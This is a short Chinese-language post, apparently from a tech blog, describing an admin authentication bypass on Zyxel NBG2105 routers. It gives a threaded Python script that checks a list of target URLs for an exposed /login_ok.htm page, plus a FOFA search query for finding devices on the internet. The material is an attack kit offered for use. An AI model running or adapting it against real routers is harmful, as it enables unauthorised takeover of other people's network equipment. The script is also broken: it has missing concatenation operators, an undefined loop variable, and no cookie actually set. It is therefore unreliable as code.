前言
在Zyxel NBG2105 V1.00(AAGU.2)C0设备上,将登录cookie设置为1可提供管理员访问权限。
poc
代码语言:javascript复制import re
from urllib import request
import time
import requests
from lxml import etree
import threading
from queue import Queue
f=open("ZyXEL_url.txt","r")
threads=[]
def thread(url,result_q):
try:
result=requests.get(url,timeout=5)
html=result.text
status=result.status_code
if status == 200:
print(url "n" "存在漏洞")
else:
print(url "n" "不存在漏洞")
except Exception as e:
print("timeout")
for line in f.readlines():
line=line.strip()
tar=line "/login_ok.htm"
t=threading.Thread(target=thread,args=(tar,Queue()))
t.start()
threads.append(t)
for i in reads:
i.join()
f.close()通过更改 login参数可用实现后台登录进而修改其配置
fofa语法:app="ZyXEL-NBG2105"
效果图
